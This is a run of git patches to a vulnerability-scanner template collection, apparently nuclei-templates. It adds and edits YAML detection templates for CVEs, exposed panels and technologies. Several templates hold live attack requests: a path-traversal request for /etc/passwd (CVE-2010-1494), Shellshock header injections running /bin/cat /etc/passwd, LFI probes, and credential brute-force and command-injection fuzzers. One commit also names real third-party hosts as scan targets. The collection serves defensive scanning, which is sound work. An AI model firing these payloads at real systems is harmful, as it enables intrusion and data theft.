From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 2 Sep 2021 06:59:23 +0700 Subject: [PATCH 1971/4083] Update CVE-2017-5487.yaml --- cves/2017/CVE-2017-5487.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2017/CVE-2017-5487.yaml b/cves/2017/CVE-2017-5487.yaml index 6063ad3685..4851c16440 100644 --- a/cves/2017/CVE-2017-5487.yaml +++ b/cves/2017/CVE-2017-5487.yaml @@ -15,7 +15,8 @@ requests: path: - "{{BaseURL}}/wp-json/wp/v2/users/" - "{{BaseURL}}/?rest_route=/wp/v2/users/" - + + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -37,4 +38,4 @@ requests: - type: regex part: body regex: - - '"name":"[^"]*"' \ No newline at end of file + - '"name":"[^"]*"' From af258e22717bef5cd33bc1240682d949a2c4100e Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 2 Sep 2021 08:03:16 +0700 Subject: [PATCH 1972/4083] Create CVE-2010-1494.yaml --- cves/2010/CVE-2010-1494.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1494.yaml diff --git a/cves/2010/CVE-2010-1494.yaml b/cves/2010/CVE-2010-1494.yaml new file mode 100644 index 0000000000..290ff32940 --- /dev/null +++ b/cves/2010/CVE-2010-1494.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1494 + +info: + name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12113 + - https://www.cvedetails.com/cve/CVE-2010-1494 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 69cafb90b1d618ac0b634c50ad7a971e85553e25 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Thu, 2 Sep 2021 00:19:36 -0400 Subject: [PATCH 1973/4083] Create adobe-coldfusion-detector.yaml examples nuclei -t adobe-coldfusion-detector.yaml -u http://www.studiobci.com/ nuclei -t adobe-coldfusion-detector.yaml -u http://app1.ancine.gov.br nuclei -t adobe-coldfusion-detector.yaml -u http://www.sem.dol.gov --- technologies/adobe-coldfusion-detector.yaml | 54 +++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 technologies/adobe-coldfusion-detector.yaml diff --git a/technologies/adobe-coldfusion-detector.yaml b/technologies/adobe-coldfusion-detector.yaml new file mode 100644 index 0000000000..7050b67fed --- /dev/null +++ b/technologies/adobe-coldfusion-detector.yaml @@ -0,0 +1,54 @@ + id: adobe-coldfusion-detector + +info: + name: Adobe ColdFusion Detector + author: philippedelteil + severity: info + description: With this template we can detect the version number of Coldfusion instances based on their logos. + tags: adobe,coldfusion + +requests: + - method: GET + path: + - "{{BaseURL}}/CFIDE/administrator/images/mx_login.gif" + - "{{BaseURL}}/cfide/administrator/images/mx_login.gif" + - "{{BaseURL}}/CFIDE/administrator/images/background.jpg" + - "{{BaseURL}}/cfide/administrator/images/background.jpg" + - "{{BaseURL}}/CFIDE/administrator/images/componentutilslogin.jpg" + - "{{BaseURL}}/cfide/administrator/images/componentutilslogin.jpg" + redirects: true + stop-at-first-match: true + max-redirects: 2 + matchers: + - type: dsl + name: "ColdFusion 8" + dsl: + - "status_code==200 && (\"da07693b70ddbac5bc0d8bf98d4a3539\" == md5(body))" + - type: dsl + name: "ColdFusion 9" + dsl: + - "status_code==200 && (\"c0757351b00f7ecf35a035c976068d12\" == md5(body))" + - type: dsl + name: "ColdFusion 10" + dsl: + - "status_code==200 && (\"a4c81b7a6289b2fc9b36848fa0cae83c\" == md5(body))" + - type: dsl + name: "ColdFusion 11" + dsl: + - "status_code==200 && (\"7f024de9f480481ca03049e0d66679d6\" == md5(body))" + - type: dsl + name: "ColdFusion 2016" + dsl: + - "status_code==200 && (\"f1281b6866aef66e35dc36fe4f0bf990\" == md5(body))" + - type: dsl + name: "ColdFusion 2021" + dsl: + - "status_code==200 && (\"a88530d7f1980412dac076de732a4e86\" == md5(body))" + - type: dsl + name: "ColdFusion 2018" + dsl: + - "status_code==200 && (\"92ef6ee3c4d1700e3cca797b19d3e7ba\" == md5(body))" + - type: dsl + name: "ColdFusion MX 7" + dsl: + - "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))" From 8f13ef9e1f6dea56712934747eeb56a941ebddfe Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 2 Sep 2021 13:15:09 +0530 Subject: [PATCH 1974/4083] misc updates --- technologies/adobe-coldfusion-detector.yaml | 30 +++++++++++++-------- 1 file changed, 19 insertions(+), 11 deletions(-) diff --git a/technologies/adobe-coldfusion-detector.yaml b/technologies/adobe-coldfusion-detector.yaml index 7050b67fed..9dee636d31 100644 --- a/technologies/adobe-coldfusion-detector.yaml +++ b/technologies/adobe-coldfusion-detector.yaml @@ -1,7 +1,7 @@ - id: adobe-coldfusion-detector +id: adobe-coldfusion-detector info: - name: Adobe ColdFusion Detector + name: Adobe ColdFusion Detector author: philippedelteil severity: info description: With this template we can detect the version number of Coldfusion instances based on their logos. @@ -16,39 +16,47 @@ requests: - "{{BaseURL}}/cfide/administrator/images/background.jpg" - "{{BaseURL}}/CFIDE/administrator/images/componentutilslogin.jpg" - "{{BaseURL}}/cfide/administrator/images/componentutilslogin.jpg" + redirects: true stop-at-first-match: true max-redirects: 2 matchers: - type: dsl - name: "ColdFusion 8" + name: "coldfusion-8" dsl: - "status_code==200 && (\"da07693b70ddbac5bc0d8bf98d4a3539\" == md5(body))" + - type: dsl - name: "ColdFusion 9" + name: "coldfusion-9" dsl: - "status_code==200 && (\"c0757351b00f7ecf35a035c976068d12\" == md5(body))" + - type: dsl - name: "ColdFusion 10" + name: "coldfusion-10" dsl: - "status_code==200 && (\"a4c81b7a6289b2fc9b36848fa0cae83c\" == md5(body))" + - type: dsl - name: "ColdFusion 11" + name: "coldfusion-11" dsl: - "status_code==200 && (\"7f024de9f480481ca03049e0d66679d6\" == md5(body))" + - type: dsl - name: "ColdFusion 2016" + name: "coldfusion-2016" dsl: - "status_code==200 && (\"f1281b6866aef66e35dc36fe4f0bf990\" == md5(body))" + - type: dsl - name: "ColdFusion 2021" + name: "coldfusion-2021" dsl: - "status_code==200 && (\"a88530d7f1980412dac076de732a4e86\" == md5(body))" + - type: dsl - name: "ColdFusion 2018" + name: "coldfusion-2018" dsl: - "status_code==200 && (\"92ef6ee3c4d1700e3cca797b19d3e7ba\" == md5(body))" + - type: dsl - name: "ColdFusion MX 7" + name: "coldfusion-mx-7" dsl: - - "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))" + - "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))" \ No newline at end of file From fa7bb137cd11098b826d767bed721109b84cffb7 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 2 Sep 2021 13:16:45 +0530 Subject: [PATCH 1975/4083] Update CVE-2017-5487.yaml --- cves/2017/CVE-2017-5487.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-5487.yaml b/cves/2017/CVE-2017-5487.yaml index 4851c16440..f7e9caec0e 100644 --- a/cves/2017/CVE-2017-5487.yaml +++ b/cves/2017/CVE-2017-5487.yaml @@ -15,7 +15,7 @@ requests: path: - "{{BaseURL}}/wp-json/wp/v2/users/" - "{{BaseURL}}/?rest_route=/wp/v2/users/" - + stop-at-first-match: true matchers-condition: and matchers: @@ -34,6 +34,7 @@ requests: - '"name":' - '"avatar_urls":' condition: and + extractors: - type: regex part: body From 34fbb6e9b22f60aea37bf4f2967c61f03ade86c4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 2 Sep 2021 16:26:06 +0530 Subject: [PATCH 1976/4083] Update CVE-2015-7450.yaml --- cves/2015/CVE-2015-7450.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml index 65da4f704a..c894930b5a 100644 --- a/cves/2015/CVE-2015-7450.yaml +++ b/cves/2015/CVE-2015-7450.yaml @@ -5,7 +5,10 @@ info: author: wdahlenb severity: critical description: Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default) - reference: https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py + reference: + - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py + - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ + - https://nvd.nist.gov/vuln/detail/CVE-2015-7450mrce tags: cve,cve2015,websphere,deserialization requests: From 30bee7b35bcb6f8fe23e45f64c47e3581c1f6a26 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 2 Sep 2021 16:26:43 +0530 Subject: [PATCH 1977/4083] Update CVE-2015-7450.yaml --- cves/2015/CVE-2015-7450.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml index c894930b5a..5bf8381ef8 100644 --- a/cves/2015/CVE-2015-7450.yaml +++ b/cves/2015/CVE-2015-7450.yaml @@ -1,7 +1,7 @@ id: CVE-2015-7450 info: - name: CVE-2015-7450 + name: IBM WebSphere Java Object Deserialization RCE author: wdahlenb severity: critical description: Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default) From e90b3bb7de2d1a968c524707bcbe6878470536da Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 2 Sep 2021 16:31:42 +0530 Subject: [PATCH 1978/4083] Update CVE-2015-7450.yaml --- cves/2015/CVE-2015-7450.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml index 5bf8381ef8..5ea32f7498 100644 --- a/cves/2015/CVE-2015-7450.yaml +++ b/cves/2015/CVE-2015-7450.yaml @@ -8,8 +8,8 @@ info: reference: - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - - https://nvd.nist.gov/vuln/detail/CVE-2015-7450mrce - tags: cve,cve2015,websphere,deserialization + - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 + tags: cve,cve2015,websphere,deserialization,rce requests: - raw: From 06833674482e8f61037adcce47b5bd2a56d39748 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 2 Sep 2021 16:38:38 +0530 Subject: [PATCH 1979/4083] Update CVE-2015-7450.yaml --- cves/2015/CVE-2015-7450.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml index 5ea32f7498..a28bfc6ead 100644 --- a/cves/2015/CVE-2015-7450.yaml +++ b/cves/2015/CVE-2015-7450.yaml @@ -38,9 +38,13 @@ requests: - type: status status: - 500 + - type: word words: - 'SOAP-ENV:Server' + - '<faultcode>' + condition: and + - type: word part: interactsh_protocol # Confirms the DNS Interaction words: From 30fd4dcfdae5c9cfb64af7067f563dd300dfdc8c Mon Sep 17 00:00:00 2001 From: Prince Chaddha <cyberbossprince@gmail.com> Date: Thu, 2 Sep 2021 16:54:12 +0530 Subject: [PATCH 1980/4083] Updated cisco-meraki-exposure --- ...etails.yaml => cisco-meraki-exposure.yaml} | 11 +++++--- misconfiguration/cisco-meraki.yaml | 25 ------------------- 2 files changed, 7 insertions(+), 29 deletions(-) rename exposed-panels/{cisco-security-details.yaml => cisco-meraki-exposure.yaml} (53%) delete mode 100644 misconfiguration/cisco-meraki.yaml diff --git a/exposed-panels/cisco-security-details.yaml b/exposed-panels/cisco-meraki-exposure.yaml similarity index 53% rename from exposed-panels/cisco-security-details.yaml rename to exposed-panels/cisco-meraki-exposure.yaml index 8ebd1577a1..112800ebd8 100644 --- a/exposed-panels/cisco-security-details.yaml +++ b/exposed-panels/cisco-meraki-exposure.yaml @@ -1,11 +1,11 @@ -id: cisco-security-details +id: cisco-meraki-exposure info: - name: Cisco Meraki cloud & Security Appliance details - author: dhiyaneshDK + name: Cisco Meraki cloud & security Appliances Information Disclosure + author: dhiyaneshDK,r3naissance severity: info reference: https://www.exploit-db.com/ghdb/6708 - tags: panel,cisco + tags: panel,cisco,meraki,disclosure requests: - method: GET @@ -17,6 +17,9 @@ requests: - type: word words: - 'Your client connection' + - 'This security appliance is directly connected to a local network' + condition: and + - type: status status: - 200 diff --git a/misconfiguration/cisco-meraki.yaml b/misconfiguration/cisco-meraki.yaml deleted file mode 100644 index 9e77ed2eaf..0000000000 --- a/misconfiguration/cisco-meraki.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: cisco-meraki - -info: - name: Cisco Meraki Information Disclosure - author: r3naissance - severity: low - description: Sensitive environment variables may not be masked - tags: cisco,meraki,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/#connection" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "meraki" - - "This security appliance is directly connected to a local network" - condition: and - - - type: status - status: - - 200 From 1238bbee451e49232cc8d5250e537ab41f0da140 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 2 Sep 2021 17:11:01 +0530 Subject: [PATCH 1981/4083] Create craft-cms-detect.yaml --- technologies/craft-cms-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/craft-cms-detect.yaml diff --git a/technologies/craft-cms-detect.yaml b/technologies/craft-cms-detect.yaml new file mode 100644 index 0000000000..ecdf4071dd --- /dev/null +++ b/technologies/craft-cms-detect.yaml @@ -0,0 +1,24 @@ +id: craft-cms-detect + +info: + name: Craft CMS Detect + author: skeltavik + severity: info + description: Detects Craft CMS + reference: https://craftcms.com + tags: tech,craftcms + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + part: header + words: + - 'X-Powered-By: Craft CMS' + + - type: status + status: + - 200 From 5c94814e0023205c608cbdf687de93c9622d3e74 Mon Sep 17 00:00:00 2001 From: "betul.kiral" <betul.kiral@btk.gov.tr> Date: Thu, 2 Sep 2021 14:43:37 +0300 Subject: [PATCH 1982/4083] Adding CVE-2020-11547 --- cves/2020/CVE-2020-11547.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2020/CVE-2020-11547.yaml diff --git a/cves/2020/CVE-2020-11547.yaml b/cves/2020/CVE-2020-11547.yaml new file mode 100644 index 0000000000..a438eb3bb3 --- /dev/null +++ b/cves/2020/CVE-2020-11547.yaml @@ -0,0 +1,23 @@ +id: CVE-2020-11547 + +info: + name: PRTG Network Monitor < 20.1.57.1745 - Information Disclosure + author: x6263 + severity: medium + description: PRTG Network Monitor before 20.1.57.1745 allows remote unauthenticated attackers to obtain information about probes running or the server itself via an HTTP request. + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2020-11547 + - https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure + tags: cve,cve2020,network,prtg,information-disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/public/login.htm?type=probes/" + matchers: + - type: word + words: + - "Probe" + - type: status + status: + - 200 From c266084621a04d2d90564eb2cfda361612de838e Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 2 Sep 2021 17:29:10 +0530 Subject: [PATCH 1983/4083] Added stop-at-first-match in applicable templates --- cves/2013/CVE-2013-3827.yaml | 1 + cves/2014/CVE-2014-6271.yaml | 3 +++ cves/2017/CVE-2017-17562.yaml | 2 +- cves/2019/CVE-2019-14322.yaml | 2 ++ cves/2019/CVE-2019-17382.yaml | 2 +- cves/2021/CVE-2021-22873.yaml | 2 ++ default-logins/aem/adobe-aem-default-credentials.yaml | 2 +- exposed-panels/adminer-panel.yaml | 1 + exposed-panels/jira-detect.yaml | 1 + exposed-panels/setup-page-exposure.yaml | 2 ++ exposed-panels/sphider-login.yaml | 1 + exposures/apis/swagger-api.yaml | 1 + exposures/apis/wadl-api.yaml | 2 ++ exposures/configs/docker-compose-config.yaml | 1 + exposures/configs/git-config-nginxoffbyslash.yaml | 4 ++-- exposures/files/axis-happyaxis.yaml | 1 + fuzzing/adminer-panel-fuzz.yaml | 2 +- fuzzing/header-command-injection.yaml | 3 ++- fuzzing/mdb-database-file.yaml | 2 +- fuzzing/wordpress-weak-credentials.yaml | 2 +- miscellaneous/htaccess-config.yaml | 1 + miscellaneous/phpmyadmin-setup.yaml | 1 + miscellaneous/unpatched-coldfusion.yaml | 1 + misconfiguration/aem/aem-default-get-servlet.yaml | 2 ++ .../aem/aem-querybuilder-internal-path-read.yaml | 1 + misconfiguration/drupal/drupal-user-enum-ajax.yaml | 3 +-- misconfiguration/drupal/drupal-user-enum-redirect.yaml | 6 ++++-- technologies/apache-axis-detect.yaml | 1 + technologies/graphql-detect.yaml | 1 + technologies/lotus-domino-version.yaml | 1 + technologies/telerik-dialoghandler-detect.yaml | 1 + vulnerabilities/generic/crlf-injection.yaml | 1 + vulnerabilities/generic/generic-linux-lfi.yaml | 1 + vulnerabilities/generic/generic-windows-lfi.yaml | 1 + vulnerabilities/generic/open-redirect.yaml | 1 + vulnerabilities/other/bitrix-open-redirect.yaml | 1 + .../other/nginx-merge-slashes-path-traversal.yaml | 1 + .../wordpress/wordpress-accessible-wpconfig.yaml | 2 ++ 38 files changed, 51 insertions(+), 13 deletions(-) diff --git a/cves/2013/CVE-2013-3827.yaml b/cves/2013/CVE-2013-3827.yaml index 2e0d3cb4a9..c9217eb4c9 100644 --- a/cves/2013/CVE-2013-3827.yaml +++ b/cves/2013/CVE-2013-3827.yaml @@ -24,6 +24,7 @@ requests: - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF" - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + stop-at-first-match: true matchers-condition: and matchers: - type: word diff --git a/cves/2014/CVE-2014-6271.yaml b/cves/2014/CVE-2014-6271.yaml index 17d32d3a26..07e8d11779 100644 --- a/cves/2014/CVE-2014-6271.yaml +++ b/cves/2014/CVE-2014-6271.yaml @@ -25,11 +25,14 @@ requests: Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " + + stop-at-first-match: true matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - "root:.*:0:0:" diff --git a/cves/2017/CVE-2017-17562.yaml b/cves/2017/CVE-2017-17562.yaml index 022074e178..136b15b2b5 100644 --- a/cves/2017/CVE-2017-17562.yaml +++ b/cves/2017/CVE-2017-17562.yaml @@ -89,7 +89,7 @@ requests: - welcome attack: sniper - + stop-at-first-match: true matchers-condition: and matchers: - type: status diff --git a/cves/2019/CVE-2019-14322.yaml b/cves/2019/CVE-2019-14322.yaml index 01a53c81c6..2aa82033aa 100644 --- a/cves/2019/CVE-2019-14322.yaml +++ b/cves/2019/CVE-2019-14322.yaml @@ -12,6 +12,8 @@ requests: - "{{BaseURL}}/base_import/static/c:/windows/win.ini" - "{{BaseURL}}/web/static/c:/windows/win.ini" - "{{BaseURL}}/base/static/c:/windows/win.ini" + + stop-at-first-match: true matchers-condition: and matchers: - type: status diff --git a/cves/2019/CVE-2019-17382.yaml b/cves/2019/CVE-2019-17382.yaml index 73290789b2..951533f8d8 100644 --- a/cves/2019/CVE-2019-17382.yaml +++ b/cves/2019/CVE-2019-17382.yaml @@ -20,7 +20,7 @@ requests: ids: helpers/wordlists/numbers.txt attack: sniper threads: 50 - + stop-at-first-match: true matchers-condition: and matchers: - type: status diff --git a/cves/2021/CVE-2021-22873.yaml b/cves/2021/CVE-2021-22873.yaml index 3f725a6db8..ba23365c25 100644 --- a/cves/2021/CVE-2021-22873.yaml +++ b/cves/2021/CVE-2021-22873.yaml @@ -18,7 +18,9 @@ requests: - "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://example.com" - "{{BaseURL}}/www/delivery/lg.php?dest=http://example.com" + stop-at-first-match: true redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: status diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml index c4227b4353..6b23e91841 100644 --- a/default-logins/aem/adobe-aem-default-credentials.yaml +++ b/default-logins/aem/adobe-aem-default-credentials.yaml @@ -50,7 +50,7 @@ requests: - password attack: pitchfork # Available options: sniper, pitchfork and clusterbomb - + stop-at-first-match: true matchers-condition: and matchers: - type: status diff --git a/exposed-panels/adminer-panel.yaml b/exposed-panels/adminer-panel.yaml index c00d3449c5..d15890b1c8 100644 --- a/exposed-panels/adminer-panel.yaml +++ b/exposed-panels/adminer-panel.yaml @@ -22,6 +22,7 @@ requests: - '{{BaseURL}}/sql.php' - '{{BaseURL}}/wp-content/plugins/adminer/adminer.php' + stop-at-first-match: true matchers-condition: and matchers: diff --git a/exposed-panels/jira-detect.yaml b/exposed-panels/jira-detect.yaml index 0e5cbb35d5..4f24793ad5 100644 --- a/exposed-panels/jira-detect.yaml +++ b/exposed-panels/jira-detect.yaml @@ -13,6 +13,7 @@ requests: - "{{BaseURL}}/jira/secure/Dashboard.jspa" - "{{BaseURL}}/login.jsp" + stop-at-first-match: true redirects: true max-redirects: 2 matchers: diff --git a/exposed-panels/setup-page-exposure.yaml b/exposed-panels/setup-page-exposure.yaml index f59a847c59..b871ff2195 100644 --- a/exposed-panels/setup-page-exposure.yaml +++ b/exposed-panels/setup-page-exposure.yaml @@ -14,6 +14,8 @@ requests: - '{{BaseURL}}/zp/zp-core/setup/index.php' - '{{BaseURL}}/gallery/zp-core/setup/index.php' - '{{BaseURL}}/zenphoto/zp-core/setup/index.php' + + stop-at-first-match: true matchers: - type: word words: diff --git a/exposed-panels/sphider-login.yaml b/exposed-panels/sphider-login.yaml index 31a5d753d0..cdfd9f13e8 100644 --- a/exposed-panels/sphider-login.yaml +++ b/exposed-panels/sphider-login.yaml @@ -14,6 +14,7 @@ requests: - '{{BaseURL}}/sphider/admin/admin.php' - '{{BaseURL}}/search/admin/admin.php' + stop-at-first-match: true matchers-condition: and matchers: - type: word diff --git a/exposures/apis/swagger-api.yaml b/exposures/apis/swagger-api.yaml index 9c60863e83..b7d499e8a8 100644 --- a/exposures/apis/swagger-api.yaml +++ b/exposures/apis/swagger-api.yaml @@ -51,6 +51,7 @@ requests: - "{{BaseURL}}/api/v1/swagger-ui/swagger.yaml" - "{{BaseURL}}/swagger-resources/restservices/v2/api-docs" + stop-at-first-match: true matchers-condition: and matchers: - type: word diff --git a/exposures/apis/wadl-api.yaml b/exposures/apis/wadl-api.yaml index 443d7a8e30..b4651efac5 100644 --- a/exposures/apis/wadl-api.yaml +++ b/exposures/apis/wadl-api.yaml @@ -31,6 +31,8 @@ requests: - "{{BaseURL}}" - "{{BaseURL}}/api/v1" - "{{BaseURL}}/api/v2" + + stop-at-first-match: true matchers: - name: http-options type: word diff --git a/exposures/configs/docker-compose-config.yaml b/exposures/configs/docker-compose-config.yaml index a6c7a48199..7a8bba1698 100644 --- a/exposures/configs/docker-compose-config.yaml +++ b/exposures/configs/docker-compose-config.yaml @@ -19,6 +19,7 @@ requests: - "{{BaseURL}}/docker-compose-dev.yml" - "{{BaseURL}}/docker-compose.override.yml" + stop-at-first-match: true matchers-condition: and matchers: - type: dsl diff --git a/exposures/configs/git-config-nginxoffbyslash.yaml b/exposures/configs/git-config-nginxoffbyslash.yaml index 3864e87340..d252900fb5 100644 --- a/exposures/configs/git-config-nginxoffbyslash.yaml +++ b/exposures/configs/git-config-nginxoffbyslash.yaml @@ -22,8 +22,8 @@ requests: - '{{BaseURL}}/events../.git/config' - '{{BaseURL}}/media../.git/config' - '{{BaseURL}}/lib../.git/config' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + + stop-at-first-match: true matchers: - type: word words: diff --git a/exposures/files/axis-happyaxis.yaml b/exposures/files/axis-happyaxis.yaml index 193c3d184f..07055894fd 100644 --- a/exposures/files/axis-happyaxis.yaml +++ b/exposures/files/axis-happyaxis.yaml @@ -14,6 +14,7 @@ requests: - "{{BaseURL}}/axis2-web/HappyAxis.jsp" - "{{BaseURL}}/happyaxis.jsp" + stop-at-first-match: true matchers-condition: and matchers: - type: word diff --git a/fuzzing/adminer-panel-fuzz.yaml b/fuzzing/adminer-panel-fuzz.yaml index 71b81d2b60..ad8ba27848 100644 --- a/fuzzing/adminer-panel-fuzz.yaml +++ b/fuzzing/adminer-panel-fuzz.yaml @@ -25,7 +25,7 @@ requests: attack: sniper threads: 50 - + stop-at-first-match: true matchers-condition: and matchers: diff --git a/fuzzing/header-command-injection.yaml b/fuzzing/header-command-injection.yaml index 2c9ca60893..3467a4c318 100644 --- a/fuzzing/header-command-injection.yaml +++ b/fuzzing/header-command-injection.yaml @@ -18,8 +18,9 @@ requests: header: helpers/payloads/request-headers.txt payload: helpers/payloads/command-injection.txt attack: clusterbomb - redirects: true + redirects: true + stop-at-first-match: true matchers-condition: or matchers: - type: word diff --git a/fuzzing/mdb-database-file.yaml b/fuzzing/mdb-database-file.yaml index 0778cdd0e4..2fe78b348f 100644 --- a/fuzzing/mdb-database-file.yaml +++ b/fuzzing/mdb-database-file.yaml @@ -22,7 +22,7 @@ requests: attack: sniper threads: 50 max-size: 500 # Size in bytes - Max Size to read from server response - + stop-at-first-match: true matchers-condition: and matchers: - type: binary diff --git a/fuzzing/wordpress-weak-credentials.yaml b/fuzzing/wordpress-weak-credentials.yaml index 205ea485bc..0bec5f6f85 100644 --- a/fuzzing/wordpress-weak-credentials.yaml +++ b/fuzzing/wordpress-weak-credentials.yaml @@ -22,7 +22,7 @@ requests: passwords: helpers/wordlists/wp-passwords.txt threads: 50 attack: clusterbomb - + stop-at-first-match: true matchers-condition: and matchers: - type: status diff --git a/miscellaneous/htaccess-config.yaml b/miscellaneous/htaccess-config.yaml index 710bb8a968..b4d2026f16 100644 --- a/miscellaneous/htaccess-config.yaml +++ b/miscellaneous/htaccess-config.yaml @@ -16,6 +16,7 @@ requests: - "{{BaseURL}}/a.htaccess" - "{{BaseURL}}/htaccess_for_page_not_found_redirects.htaccess" + stop-at-first-match: true matchers: - type: word words: diff --git a/miscellaneous/phpmyadmin-setup.yaml b/miscellaneous/phpmyadmin-setup.yaml index e914ba5546..72870b91b5 100644 --- a/miscellaneous/phpmyadmin-setup.yaml +++ b/miscellaneous/phpmyadmin-setup.yaml @@ -18,6 +18,7 @@ requests: - "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php" - "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php" + stop-at-first-match: true matchers-condition: and matchers: - type: word diff --git a/miscellaneous/unpatched-coldfusion.yaml b/miscellaneous/unpatched-coldfusion.yaml index 6458cde99d..b5999fa193 100644 --- a/miscellaneous/unpatched-coldfusion.yaml +++ b/miscellaneous/unpatched-coldfusion.yaml @@ -20,6 +20,7 @@ requests: - "{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js" - "{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js" + stop-at-first-match: true matchers-condition: and matchers: diff --git a/misconfiguration/aem/aem-default-get-servlet.yaml b/misconfiguration/aem/aem-default-get-servlet.yaml index d3546ab204..7186c2256f 100644 --- a/misconfiguration/aem/aem-default-get-servlet.yaml +++ b/misconfiguration/aem/aem-default-get-servlet.yaml @@ -66,6 +66,8 @@ requests: - '{{BaseURL}}///etc.children.json/FNZ.html' - '{{BaseURL}}///etc.children.json/FNZ.png' - '{{BaseURL}}///etc.children.json/FNZ.ico' + + stop-at-first-match: true matchers-condition: and matchers: - type: status diff --git a/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml b/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml index c3365b1e2d..f088c74a61 100644 --- a/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml +++ b/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml @@ -16,6 +16,7 @@ requests: - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1' - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1' + stop-at-first-match: true matchers-condition: and matchers: - type: status diff --git a/misconfiguration/drupal/drupal-user-enum-ajax.yaml b/misconfiguration/drupal/drupal-user-enum-ajax.yaml index 041d0eee48..99667e96a3 100644 --- a/misconfiguration/drupal/drupal-user-enum-ajax.yaml +++ b/misconfiguration/drupal/drupal-user-enum-ajax.yaml @@ -13,9 +13,8 @@ requests: - 